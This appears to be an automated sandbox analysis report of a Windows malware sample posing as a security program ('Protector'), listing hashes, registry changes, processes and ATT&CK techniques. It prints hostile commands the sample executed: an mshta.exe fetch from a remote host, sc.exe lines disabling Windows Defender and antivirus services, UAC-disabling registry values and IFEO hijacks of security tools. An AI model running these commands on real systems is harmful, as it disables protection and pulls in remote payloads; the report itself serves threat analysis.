Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
150s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
19/08/2024, 19:07
Static task
static1
Behavioral task
behavioral1
Sample
70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
Resource
win10v2004-20240802-en
General
-
Target
70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe
-
Size
2.1MB
-
MD5
ac2bf4a9c78fa484d14d45ebb20bb63d
-
SHA1
0f2164ff2bfd617e2d37e847541a1ed7aacafe94
-
SHA256
70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2
-
SHA512
6a8191e115e8b99424cdaa0ade7b148c14782dfbea981692a106e6b66ae1dae474bae37571b542ae5992d263851f292f7731f3449750c6bbd2bde260671323bd
-
SSDEEP
49152:DIqjmpWdn49S5w+z4BYAiaxs6v5fZ3RyGw0cobvZxC7yciIB:DBmpWdn4ww+z4mu5fNAGw0ZVEyciIB
Malware Config
Extracted
http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-vrhp.exe -
Disables taskbar notifications via registry modification
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 64 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\w32dsm89.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashAvast.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avwupd32.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BDSurvey.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lnetinfo.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ollydbg.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avkwctl9.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfinet.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\platin.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\start.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zonalm2601.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\agentsvr.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mpftray.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\nstask32.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PskSvc.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\titanin.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mfweng3.02d30.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oaui.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\_avp32.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MalwareRemoval.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusXP.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashServ.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxmonitornt.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\JsRcGen.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\securitysoldier.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\smc.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccSvcHst.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\window.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\platin.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ppinupdt.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sbserv.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfpupdat.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\inetlnfo.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\npfmessenger.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\upgrad.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AntivirusPlus\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ashPopWz.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cssconfg.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\frw.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\processmonitor.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\normist.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\stcloader.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\aswRegSvr.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bundle.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctrl.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install[5].exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mslaugh.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldpromenu.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WebProxy.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ackwin32.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atguard.exe Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avxquar.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fsaa.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\init.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\teekids.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bpc.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cfplogvw.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\pcscan.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\scan32.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\snetcfg.exe\Debugger = "svchost.exe" Protector-vrhp.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ldnetmon.exe Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rav7win.exe\Debugger = "svchost.exe" Protector-vrhp.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\safeweb.exe\Debugger = "svchost.exe" Protector-vrhp.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation 4vvp77et9k06cow.exe Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation cn86j85204q2lk6.exe -
Executes dropped EXE 3 IoCs
pid Process 4572 4vvp77et9k06cow.exe 724 cn86j85204q2lk6.exe 5004 Protector-vrhp.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Inspector = "C:\\Users\\Admin\\AppData\\Roaming\\Protector-vrhp.exe" Protector-vrhp.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-vrhp.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc Protector-vrhp.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc Protector-vrhp.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc Protector-vrhp.exe -
Launches sc.exe 8 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3188 sc.exe 2256 sc.exe 1868 sc.exe 4864 sc.exe 1852 sc.exe 756 sc.exe 2112 sc.exe 1608 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4vvp77et9k06cow.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cn86j85204q2lk6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Protector-vrhp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312 Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE ERROR PAGE BYPASS ZONE CHECK FOR HTTPS KB954312\iexplore.exe = "1" Protector-vrhp.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 724 cn86j85204q2lk6.exe Token: SeShutdownPrivilege 724 cn86j85204q2lk6.exe Token: SeDebugPrivilege 5004 Protector-vrhp.exe Token: SeShutdownPrivilege 5004 Protector-vrhp.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 724 cn86j85204q2lk6.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe 5004 Protector-vrhp.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 1456 wrote to memory of 4572 1456 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe 86 PID 1456 wrote to memory of 4572 1456 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe 86 PID 1456 wrote to memory of 4572 1456 70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe 86 PID 4572 wrote to memory of 724 4572 4vvp77et9k06cow.exe 87 PID 4572 wrote to memory of 724 4572 4vvp77et9k06cow.exe 87 PID 4572 wrote to memory of 724 4572 4vvp77et9k06cow.exe 87 PID 724 wrote to memory of 5004 724 cn86j85204q2lk6.exe 89 PID 724 wrote to memory of 5004 724 cn86j85204q2lk6.exe 89 PID 724 wrote to memory of 5004 724 cn86j85204q2lk6.exe 89 PID 724 wrote to memory of 1192 724 cn86j85204q2lk6.exe 90 PID 724 wrote to memory of 1192 724 cn86j85204q2lk6.exe 90 PID 724 wrote to memory of 1192 724 cn86j85204q2lk6.exe 90 PID 5004 wrote to memory of 220 5004 Protector-vrhp.exe 92 PID 5004 wrote to memory of 220 5004 Protector-vrhp.exe 92 PID 5004 wrote to memory of 220 5004 Protector-vrhp.exe 92 PID 5004 wrote to memory of 4864 5004 Protector-vrhp.exe 101 PID 5004 wrote to memory of 4864 5004 Protector-vrhp.exe 101 PID 5004 wrote to memory of 4864 5004 Protector-vrhp.exe 101 PID 5004 wrote to memory of 1852 5004 Protector-vrhp.exe 102 PID 5004 wrote to memory of 1852 5004 Protector-vrhp.exe 102 PID 5004 wrote to memory of 1852 5004 Protector-vrhp.exe 102 PID 5004 wrote to memory of 756 5004 Protector-vrhp.exe 103 PID 5004 wrote to memory of 756 5004 Protector-vrhp.exe 103 PID 5004 wrote to memory of 756 5004 Protector-vrhp.exe 103 PID 5004 wrote to memory of 1868 5004 Protector-vrhp.exe 105 PID 5004 wrote to memory of 1868 5004 Protector-vrhp.exe 105 PID 5004 wrote to memory of 1868 5004 Protector-vrhp.exe 105 PID 5004 wrote to memory of 2256 5004 Protector-vrhp.exe 107 PID 5004 wrote to memory of 2256 5004 Protector-vrhp.exe 107 PID 5004 wrote to memory of 2256 5004 Protector-vrhp.exe 107 PID 5004 wrote to memory of 3188 5004 Protector-vrhp.exe 108 PID 5004 wrote to memory of 3188 5004 Protector-vrhp.exe 108 PID 5004 wrote to memory of 3188 5004 Protector-vrhp.exe 108 PID 5004 wrote to memory of 1608 5004 Protector-vrhp.exe 109 PID 5004 wrote to memory of 1608 5004 Protector-vrhp.exe 109 PID 5004 wrote to memory of 1608 5004 Protector-vrhp.exe 109 PID 5004 wrote to memory of 2112 5004 Protector-vrhp.exe 111 PID 5004 wrote to memory of 2112 5004 Protector-vrhp.exe 111 PID 5004 wrote to memory of 2112 5004 Protector-vrhp.exe 111 -
System policy modification 1 TTPs 4 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" Protector-vrhp.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" Protector-vrhp.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe"C:\Users\Admin\AppData\Local\Temp\70935d0e07cdaf318ab5631d0788ed1d8186d65b531b5789f15b561fcfea64f2.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1456 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\4vvp77et9k06cow.exe" -e -p4dd2wgad9575xn42⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\cn86j85204q2lk6.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:724 -
C:\Users\Admin\AppData\Roaming\Protector-vrhp.exeC:\Users\Admin\AppData\Roaming\Protector-vrhp.exe4⤵
- UAC bypass
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:5004 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://galaint.online-secure-pay.info/?0=112&1=3&2=1&3=31&4=i&5=9200&6=6&7=2&8=919041&9=1033&10=0&11=0000&12=iurskupcoc&14=1"5⤵
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Windows\SysWOW64\sc.exesc stop WinDefend5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4864
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1852
-
-
C:\Windows\SysWOW64\sc.exesc stop msmpsvc5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:756
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1868
-
-
C:\Windows\SysWOW64\sc.exesc config ekrn start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2256
-
-
C:\Windows\SysWOW64\sc.exesc stop AntiVirService5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:3188
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1608
-
-
C:\Windows\SysWOW64\sc.exesc config AntiVirSchedulerService start= disabled5⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:2112
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\CN86J8~1.EXE" >> NUL4⤵
- System Location Discovery: System Language Discovery
PID:1192
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
1Indicator Removal
1File Deletion
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5d2d1c9c8bb295f187be0cda58d303bbb
SHA190963d63b1068613053acb0f1f2a7ea8ae4bee83
SHA256af6d0ae360a122ff23b5b3e8ef36176b3697eb0710852ff075e3014b360d8733
SHA512835693f8414f90a232b0b585a9748ddaa450f76c0b25e98cea44799a2413fc69519e4bf6fb08d090056e6df86c4c107971a8dae8f996d2e9373131c235b6d307
-
Filesize
1.9MB
MD5ca5c540f357be8a95512d23fed022883
SHA10122533984c6b90856f1b39c6e5332c0a80e18f0
SHA2566dc40b6231fef0ddd7533646f3b3a592f6258998a010b519efbf3892d95ba476
SHA5125129db04faecd4459cc771ec5353e1dd9f5bf584ed190d3178898446644efac93688f6fa1e20690d1208b1494c57af9ec315a78d43fef4d576eb4de3bad4d9b0